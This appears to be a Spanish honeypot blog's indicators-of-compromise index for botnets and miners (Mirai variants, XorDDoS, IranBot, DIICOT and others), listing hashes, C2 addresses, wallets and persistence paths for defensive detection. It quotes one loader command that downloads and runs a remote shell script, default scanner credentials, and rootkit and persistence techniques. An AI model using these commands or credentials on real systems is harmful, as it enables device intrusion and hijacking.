ES EN
Portada

Bitácora de un honeypot perdido

Indicadores

Todo lo que hay que buscar: hashes, direcciones, dominios, claves y cadenas de cada bicho que ha caído en el cebo, con el capítulo donde se explica de dónde sale cada uno.

Si has llegado aquí buscando un hash o una dirección, esto es lo que hay. Cada indicador viene de un análisis publicado, y el enlace de la derecha lleva al capítulo donde se explica de dónde sale y qué significa — que es lo que una lista, por sí sola, nunca dice.

Las URLs van ofuscadas a propósito (hxxp://, [.]): identifican igual y no se pinchan sin querer. Las IPs y los dominios se dan tal cual, que para eso son indicadores.

KHserver cap. 11 · cap. 12

TipoIndicadorContexto
sha256f7134ec664ca003c740337cf7b2fbba1162430d86ca1d7a2b5c14fe0463d261bcargador handshakebins.sh fuente →
sha256b297dc8f54f612f92c26735ab50e1360057df3909556d85e6439e695aa646148bot · Renesas SH (servido como ARMV4L) fuente →
sha2560658e79b91e732723b540ee7040eb0289c497f781d750e42b25dfcf10d233f50bot · ARM (servido como MIPS) fuente →
sha2565a21c34ff54ab1a92246b9cfba815ed187fe636b9350d41e26c5e4aa8f4bf891bot · ARM EABI4 (servido como X86_64) fuente →
ip45.95.168.149:888centro de mando · MAXKO d.o.o., AS211619 fuente → · mi reporte ↗
ip213.232.114.14servidor de payload · VirMach/xTom, AS3214 fuente →
ip45.135.194.26IP atacante · Pfcloud UG, AS51396 fuente →
urlhxxp://213.232.114[.]14/handshakebins.shdescarga del cargador fuente →
cadenaKHserverHACKER · KHcommSOCKmarcas internas del binario fuente →
cadenaecho PAYLOAD_EXECUTEDbaliza tras infectar fuente →
cadenaREPORT EXPLOIT %s %s:%dprotocolo del C2 fuente →
cadena4E/x31/x6B/x4B/x31/x20…carga de UDPBYPASS, heredada de SBIDIOT (2021) fuente →
cadenakhugepaged · kthreadd · kworker · systemd · dbus-daemonnombres de proceso que suplanta fuente →
cadenaAboriginal Linuxtoolchain cruzado con el que se compiló fuente →

Sysorbit cap. 7 · cap. 8

TipoIndicadorContexto
sha25631de5c5d0a3483e831e4f9348d46b3c5309177a7f9d6da537fc970f57f103901sysorbit.apk fuente →
dominioorbitcnc.twilightparadox.comC2 activo → 176.65.139.248:10293 fuente → · mi reporte ↗
dominioupdatemc.twilightparadox.comC2 activo → 176.65.139.248:10293 fuente → · mi reporte ↗
dominioudpatetbl.duckdns.org · coxm.duckdns.orgC2 de reserva (dormidos) fuente →
ip176.65.139.248distribución y C2 · puerto 10293 fuente → · mi reporte ↗
tokenORBIT_BOT_AUTHVXJUACFHAVBAtoken de autenticación contra el C2 fuente →
cert01:B9:F7:13:02:D0:B1:39:3B:B3:EC:FA:B8:1E:9B:B9:6F:C6:58:33:0A:18:15:EE:C9:32:C0:D9:F2:E8:5C:E9certificado que suplanta a una empresa española fuente →
cadenacom.sysorbit.service.securitypaquete Android fuente →
cadenasysorbit_watchdog · sysorbit_native_locksockets abstractos fuente →

RedTail cap. 5 · cap. 6

TipoIndicadorContexto
sha256f0aa83bbbd2c75e2f71ec16029ee5fcfad59f3a8efa30a500b815f0f6c18d987minero x86_64 fuente →
sha256d1cac82f44b54b0fd244a9e4122811e9ae108a197c7a65a20fd2e7552683e68eminero aarch64 fuente →
sha2563f3bf218089d1488617d37f8a5116bb2791eb39ce06a1b5bc9a4cdfe5e94dd39minero riscv fuente →
sha2563f3a11bafabb1a35db913cfe51995f2e357d049e268860175876ae5a93d23892script de limpieza fuente →
ip217.60.195.113servidor de reparto · usuario SFTP dlr fuente →
ip103.46.186.105IP atacante fuente →
claveed25519 · comentario dlr@sftpclave privada que planta para descargar el payload fuente →
sha2560db4656687a425c47d19000db866db52c7e415dbfaf6b5c651adcb9275ab23cala llave privada, tal cual la escribe en disco fuente →
sha256ae8d459595257f2f22c9d1ff74c4fb8a91643fad7899b57556496716692b904eel sshcfg que la acompaña · StrictHostKeyChecking no fuente →
cadenaauth_ok · redtail_bot_telnet_okbalizas fuente →
puerto2137/TCPpuerto de sus pools de minado fuente →
ruta/var/build/redtail/scripts/x86_64-build/ruta de compilación dentro del binario fuente →

Mirai cap. 3 · cap. 4 · cap. 17

TipoIndicadorContexto
sha256bf0aabf517685756f16b22f4b1907113a1cd160fa7b5ee384cb554b42b311841bot x86-64 fuente →
sha2568bdbe21eafc7223a75ea9d075237d389e0c39f6370721f1ea36214989e5bab63bot ARM fuente →
sha2565c502903694591a219ca263247c4c159967c5838c9a85641f3fb908b983d1e32bot MIPS (BE) fuente →
sha256a75a98641037e42abb4c543d90e81dafdae3b27e90972b705a2e9242a5bee123bot MIPS (LE) fuente →
sha2569d44d4d051f6aa3fbc95fab0aae818347a602d655fa7f1fba6267e728d7ff2d3bot PowerPC fuente →
sha256abda6887930f4e2e1047b39adf23bbf8bdee9e15c7e2101245bb690be7d80488bot SPARC fuente →
sha2563366350561c41f5d15994244bfd7358ca256d16a1e954d7a986bd4d2d50c895ebot Motorola m68k fuente →
sha25641ac975aa0638b879bade9f672fbcdacb303bc6ceb5e92083b85af9cd440cd04bot Renesas SH fuente →
dominiokappadocia.netC2 → 141.98.10.50 fuente →
ip5.182.210.174servidor de reparto (FileServer en Go) fuente →
dominiocc.nhancute.siteC2 · puerto 47925 → 160.250.181.124 (la misma caja que reparte) fuente →
ip160.250.181.124reparto y C2 · VPSRE, Vietnam, AS150895 fuente →
ip160.250.181.123IP atacante por ADB · barre y luego carga fuente →
urlhxxp://160.250.181[.]124/k7m2q9xa/directorio de reparto (12 arquitecturas) fuente →
urlhxxp://160.250.181[.]124/b4k9zp[.]shdropper (los otros dos: a7m2qx.sh, c8r3nv.sh) fuente →
sha256e60423da9b1484739cf0b7b883f2b74c9b9acab07e9db90c468960a691650fb1bot ARM · servido como «arm» fuente → · mi muestra ↗
sha256873072018241d6efac32e47b8061d76f4b124ba6e6ab69609714f814b2a97f46bot ARM · servido como «arm5» fuente → · mi muestra ↗
sha256ee7c389272eed8a12562f29c985b93d2273ffff0cced791bd51e7ebe3ffe7ab0bot ARM EABI4 · servido como «arm6» fuente → · mi muestra ↗
sha256239751754b0a33534fb3370d70a85cf409d346fb50fb96819756313958f7e4f2bot ARM EABI4 · servido como «arm7» fuente → · mi muestra ↗
sha256b08b41923efe6973da9c9782fd32df33bdd2b6f61ca421918b111bf9fc839098bot Motorola 68020 · servido como «m68k» fuente → · mi muestra ↗
sha256904d5309b45a0691ec526de4daac7a039c717e933e0f4410e1eb6a9e82275764bot MIPS (BE) · servido como «mips» fuente → · mi muestra ↗
sha25635574f2eb27f869415538a0e85531fa225416fc4e2b9e323d37bbcd519088b25bot MIPS (LE) · servido como «mpsl» fuente → · mi muestra ↗
sha2560a8f44e98e4a87e20cf492dfab870d8067d31e4650a9200d55545eb13cfc48b5bot PowerPC · servido como «ppc» fuente → · mi muestra ↗
sha2562f468807a88b41d0386960ed7cf48ea6a3bc1222ff1139cf8ca6194cec62737dbot SPARC · servido como «sh4» fuente → · mi muestra ↗
sha25607fe68558b309c5537d7f751a879cb64baa0960f28eb2e86c27076d7e219be4cbot Renesas SH · servido como «spc» fuente → · mi muestra ↗
sha2566502ee33f11f99c9e52e10d301275e61e85065643c3628387e7436ca9b0fc9e5bot Intel i386 · servido como «x86» fuente → · mi muestra ↗
sha2561bf4366ad6b382991c6b8c68b4863e9bafcc8e9533867b0e17b1d5825689c143bot x86-64 · servido como «x8664» fuente → · mi muestra ↗
cadenatop1hbtmarcador de campaña (top1hbt.<arch>, lo que cada bot re-sirve) fuente →
cadena/var/Condi · condi2 %s:%d · webservautoidentificación de la familia fuente →
clavetable_key = 0x6d53d2c2config XOR · clave efectiva de 1 byte 0x2e (borra los puntos del dominio) fuente →
cadena66 99 66cabecera de la trama bot↔C2 + longitud (2 B) + carga (ping, condi2 webserv:<puerto>) fuente →
cadenaServer: Apache · User-Agent: Update v1.0httpd falso de cada bot, en puerto alto aleatorio fuente →
ruta/sbin · /usr/sbin · /bin · /usr/bin × reboot, shutdown, poweroff, halt16 rutas borradas con unlink desde main (el Condi público cubre 8) fuente →
ip45.198.224.26IP atacante (loader) fuente →
cadenamilnetv4 · marcador .animevariante y marcador de la familia fuente →
claveXOR de 1 byte · 0x54cifrado de la configuración fuente →
cadena/home/landley/aboriginal/…huella del toolchain cruzado Aboriginal Linux, el que venía con la fuga del código de Mirai en 2016 · a la vista en el único binario del lote sin stripear fuente →

XorDDoS cap. 1 · cap. 2

TipoIndicadorContexto
sha2566f45c6d9c70d97f695cb7bbef362812a17f8ed4d37dafc342c26c86ed9b43638bot fuente →
urlhxxp://169.239.130[.]20/new.phpservidor de distribución (loader) fuente →
dominiosys-kernel-update.toC2 vivo → 141.98.11.51 · puerto 1529 fuente →
dominiotelemetry-pipe.sh · api-metadata-v6.isC2 de reserva (dormidos) fuente →
ip141.98.11.51C2 activo · HostBaltic, AS209605 (LT) — la IP rota dentro del ASN: en junio era 141.98.10.115. Lo que perdura es el par dominio + ASN fuente →
claveBB2FA36AAA9541F0clave XOR de 16 bytes de la config fuente →
ruta/etc/cron.hourly/gcc.sh · /var/run/gcc.pidpersistencia fuente →
cadenawget→good · curl→coolrenombra las herramientas para cegar a la competencia fuente →
ruta/usr/lib/libudev.sose copia ahí al arrancar · mismo SHA-256 que la muestra fuente →
ruta/usr/bin/<diez letras al azar>copia con nombre aleatorio · hash DISTINTO al de la muestra (visto: nhwqrnmkhg, frxuyzisvv) fuente →
cadenacrond · /usr/sbin/gdm3 · rpc.statd · automount · rpc.idmapd · /sbin/audispddemonios que suplanta falseando argv[0] · el nombre que ve el núcleo sigue siendo el real fuente →

Trinity cap. 13 · cap. 10

TipoIndicadorContexto
sha25676ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64propagador (trinity) · ofuscado con OLLVM fuente →
sha256a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437endat · contenedor autoextraíble (APK + script + minero) fuente →
sha256d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0xig · lanzador (153 KB) fuente →
clave44XT4KvmobTQfeWa6PCQF5RDosr2MLWm43AsaE3o5iNRXXTfDbYk2VPHTVedTQHZyfXNzMn8YYF2466d3FSDT7gJS8gdHArcartera de Monero del operador fuente →
ip139.99.9.133:5555pool de minado activo · OVH SAS, Singapur fuente → · mi reporte ↗
ip78.46.89.102:7777pool de reserva · Hetzner, Alemania fuente → · mi reporte ↗
ruta/system/bin/debuggerd (original → debuggerd64_real)persistencia: suplanta el gestor de fallos de Android fuente →
cadenacom.google.time.timer · com.android.good.miner · com.google.test.testmineros rivales que desinstala fuente →
sha2560d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257APK fuente →
md58844985fcd57b0311d1d4cb2ec13a1efAPK fuente →
cadenacom.ufo.miner · com.example.test.MainActivitypaquete y actividad fuente →
clavefwW95bBFO91OKUsz1VhlMEQwxmDBz7XEclave de Coinhive (el servicio cerró en 2019) fuente →
ruta/data/local/tmp/ufo.apkruta de instalación por ADB fuente →

VoIP cap. 9

TipoIndicadorContexto
ip172.110.223.49inundación INVITE · UA pplsip · AS23470 ReliableSite (US) fuente →
ip94.26.31.62inundación INVITE · UA VOIP · AS29802 Hivelocity (US) fuente →
ip23.111.166.26inundación INVITE · UA Cisco-SIPGateway falsificado fuente →
ip158.51.78.101fuerza bruta REGISTER · Turquía fuente →
ip185.114.48.195fuerza bruta REGISTER · AS199792 ClearStack (NL) fuente →
cadenapplsip · friendly-scanner · Cisco-SIPGateway (spoof)user-agents SIP maliciosos fuente →

Cling cap. 18 · cap. 19 ⬇ YARA

TipoIndicadorContexto
sha2561631e63ee373601c1f42f2674f996fc6c14dc6aebe45ca5d2395bf347a0e3661bot · aarch64 (los hashes caducan: el operador recompila) fuente →
sha2561b831a9366cd53a4127f885dab247bc2f0b3f661a7d9d9510bbd0a9f150bfb27bot · i686 fuente →
sha25652bff4bf58eb6031c16763b12b696e849a38f36e69c55402a444819cb9c1bc0ebot · i586 fuente →
ip85.11.167.132nodo infectado que atacó el cebo por Telnet fuente →
urlhxxp://118.145.196[.]225:800/servidor de reparto (wget.sh + un binario por arquitectura) fuente →
cadenaclingwashereUser-Agent al propagarse por el puerto 7547 (TR-064) fuente →
ruta/root/.cling · /usr/local/bin/.cling · .cling en inittab/rcS/rc.bootpersistencia en disco fuente →
cadenafirma de red: STUN a 13 servidores casi a la vez · transaction ID a cero · baliza (etiqueta + 26 B) cada 5 slo que de verdad caza a Cling: su comportamiento, no el hash fuente →
cadenafirma del escáner: SYN salientes con puerto de origen fijo 9999un escaneo normal deja el puerto de origen al azar; este lo clava fuente →
cadena127.0.0.1:33957 en escuchacerrojo local de instancia única fuente →
cadenasuplantación de init: /proc/<pid> que es bind mount de /tmp, idéntico a /proc/1pregunta quién es y el kernel contesta «init» fuente →
cadenaórdenes UDP disfrazadas de STUN, sin autenticación (deducido)el bot no comprueba quién manda; no sirve como firma de red fiable fuente →
ip145.249.115.184el buzón del operador (ago-2026) · AS215540 · monocultivo: 71/71 ficheros que le hablan son malware, 0 benignos fuente →
ip94.154.43.158C2 anterior (jul-2026) · en un /24 que salta de ASN; hoy AS219502 (Storm) fuente →
dominioboymoder.ddns.netC2 de 2025 · DNS dinámico fuente →

IranBot cap. 21 · cap. 22

TipoIndicadorContexto
ip176.65.139.206una sola máquina hace de todo: ataca, reparte (:80) y es el C2 (:2000) · AS219502, Storm Industries fuente →
ip176.65.139.206:2000C2 en claro, sin cifrar y sin dominio (revelado en el cap. 22) fuente →
urlhxxp://176.65.139[.]206/cat.shservidor de reparto (cat.sh + iran.<arch> para 14 arquitecturas) fuente →
credencialtelnet / telnetcredenciales con las que entró al cebo (root/icatch99 falló) fuente →
cadenacatloaderetiqueta de campaña en argv del cargador fuente →
cadenaNot a mirai at all · Death to israel · selfrep.realtekmarcadores de familia en las cadenas del binario fuente →
cadenacd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://<ip>/cat.sh; chmod cat.sh; sh cat.shcadena de infección del cargador (aguanta entre recompilaciones) fuente →
cadenaMozilla/5.0 (Windows NT 10.0; Win64; x64) ... Chrome/58.0.3029.110User-Agent fijo de su método httpmode= fuente →
cveCVE-2021-35394Realtek Jungle SDK (UDP 9034), uno de sus dos vectores de propagación fuente →
cadenapuertos fijos: 2000 (mando) · 9034/udp (Realtek) · 23 (escáner telnet)los lleva incrustados el binario fuente →
ruta/etc/init.d/xs.main · /etc/rc.localpersistencia (documentada por su ficha en VirusTotal) fuente →
sha2566a4503094d0031ae36c8b27cc36696087831901dfa421675ccb7509c9d7e58dacargador cat.sh (1.903 B) — los hashes caducan: recompila fuente →
sha256f35bf04216d14180f9d28f6770a5722557f4a979d746f4ef664419363d0b755bbot · x86-64 fuente →
sha2563f21d6f8621e38d2bc923dfaaf0861887c6ca0def522ae4dea0f9b840bf1d39abot · m68k fuente →
sha256064d93495573a536517fa7ddf9fb6d3c4cddd4c7fdc61d4f90d12629cad690e6bot · MIPS fuente →
sha256ce452891a6e017f2523f8c7005df1180003ab3e96916774efb432bcc2a8e657fbot · MIPSEL fuente →
sha256b1a6dba6636b519d76d7219f6264ac9f1456681c0855baef954fb435d3e25ce5gemelo x86-64 (164.272 B) usado en el análisis diferencial · C2 103.83.87.122:8060 fuente →
dominiofemboys.chloebulldog.online:44510 · mythickass.onthewifi.com:313 · 103.83.87.122:8060C2 anteriores de la familia (contexto) fuente →

DIICOT cap. 23 · cap. 24 · cap. 25 · cap. 26 · cap. 27 · cap. 28

TipoIndicadorContexto
sha256a151d3f4f2422531f30a843ffb35479596c86722bb103bdf8591105687f9b125minero · el binario que se bajó y se ejecutó como .16 fuente →
ip92.118.39.77IP de origen · segunda visita fuente →
ip62.171.133.1IP de origen · tercera y cuarta visita, la misma reincidente fuente →
urlhxxp://5.189.149[.]171/f/brute/m/.16_<arch>servidor de reparto · ruta estructurada campaña/tipo/arquitectura fuente →
cadenafunction top() en ~/.bashrc que filtra la salida por sed borrando 16, libbase.sh y un número variablebackdoor de shell · el comando top miente fuente →
ruta16 · /dev/shm/.16 · /root/.16nombre de proceso y de fichero del minero fuente →
rutasystem-helper · /etc/cron.d/cron_d_<n> · /etc/ld.so.preload · /root/.profilepersistencia · cinco vías a la vez fuente →
clave89PNDJssF3RbL6m7aSydYB4tLrvjZ28Cr8n4LucmFHat8botWkWr6oDPEaSHfeZn4wfA3dC5QsE7nZV1P6tE81sK2i9heamcartera de Monero en uso fuente →
ip169.58.248.162:443proxy de minado · sin TLS; indicador extraído, no conexión observada fuente →
ip5.189.149.171servidor de reparto fuente →
dominioproject0.ccdominio del reparto fuente →
dominiopool-{fr,phx,nyc,hk,sg,aus,ca}.supportxmr.com:5555pools de reserva · los siete, en claro fuente →
claveXOR de un byte, clave 0x5Acifrado de la config · barre las 256, puede cambiar entre componentes fuente →
ruta/usr/local/lib/libcommon.sorootkit · engancha readdir fuente →
ruta/var/tmp/snap · .X0-lockcargas en disco fuente →
cadena__TTY_GUARD_OK__autocomprobación tras escribir el enganche de shell fuente →
clave87Fxj6UD…cartera anterior · cobrando desde 2021-01-14, parada el 2026-08-03 fuente →
cadena16nombre de trabajador en el pool · el mismo con el que se camufla en la máquina fuente →
ip109.160.32.115origen de la intrusión · ASN 197170 TechTies fuente →
sha25628e0c4d5bc6675537ba47c6529877a3194a29585fb86477f66bf13c79252d2f0dropper · Go + UPX, 16,6 MB, con cinco módulos dentro fuente →
sha2567d55a90710b8e79283efd756e8d3423fc23e0dcf742d6027b1a2a1b9d02a9c16el bot · malla P2P y mando por Telegram fuente →
sha25679a47c33335fe1ed871a23cf7972652ee08a3ec0afed1c2dc6b5a8df675e153dXMRig, sin configurar fuente →
sha256ffe04bc05a56f78b1273876cf17ded8df1aa3da5a15deb17dce99a3e206eb705el loader · motor de persistencia y descarga fuente →
sha256c1c122869f46aaf8c4e90f3132c93a801c853244c756966952d0bf19241cf084segundo minero fuente →
ruta/tmp/{cache,diicot,kuak} · /dev/shm/retea · /dev/shm/.x/{network,pass,bios.txt}los cinco módulos y su diccionario, en disco fuente →
cadena/tmp/d.log con el contenido «admin»marca de que la máquina ya es suya fuente →
credencialroot:Huawei@123 en el diccionario del escánerdelata a qué cacharros apunta además de a servidores fuente →
puertoTCP 8081la malla · escucha y se anuncia; objetivo 2.000 conexiones fuente →
ip91.92.47.220:8081vecino de arranque grabado en el binario fuente →
ip31.57.105.94:42servicio propio del atacante para «cuál es mi IP» fuente →
token8778142498:AAE2YhxC6AB5PF8GOucHxCviYV4FA1JJnIEidentificador del bot de Telegram · ya cancelado fuente →
cadenaUser-Agent: skemano se parece a ningún navegador · buena firma de red fuente →
cadena6059167279número del operador · el único autorizado a dar órdenes fuente →
cadenaDIICOT-BOTNET · v2-update-1el propio panel de estado dice cómo se llama y su versión fuente →
cadenapeers.dat · semilla p2p-peers-salt-v1fichero de vecinos de la malla fuente →
cadenamyservices.service → /bin/bash /usr/bin/ssshd · RestartSec=1800servicio de systemd con nombre de sistema fuente →
ruta/usr/bin/ssshdcon tres eses · es el stager, no el demonio SSH fuente →
ruta/var/tmp/<8 hex>/8b8989e8cron de root cada minuto · el directorio cambia en cada infección fuente →
cadenaElPatrono1337comentario de la llave SSH que planta en /root/.ssh/authorized_keys fuente →
ruta/tmp/.fontconfig/.fc-cache · /var/tmp/.ladyg0g0/.pr1nc35 · /var/tmp/Documents/.diicotmarcadores en disco fuente →
sha2562bcc91fdedb8c583a9fe883be9ad453333a1bba0fdf655474982db3cbb8e7a74el stager que baja la configuración de minado fuente →
urlhxxp://195.24.237.240/.x/black3segunda etapa · caída a 19-sep-2026 fuente →
dominiodigital.digitaldatainsights[.]orgrespaldo de la segunda etapa · caído fuente →
cadenaladyg0g0 · .pr1nc35otros alias del actor, en las rutas que deja fuente →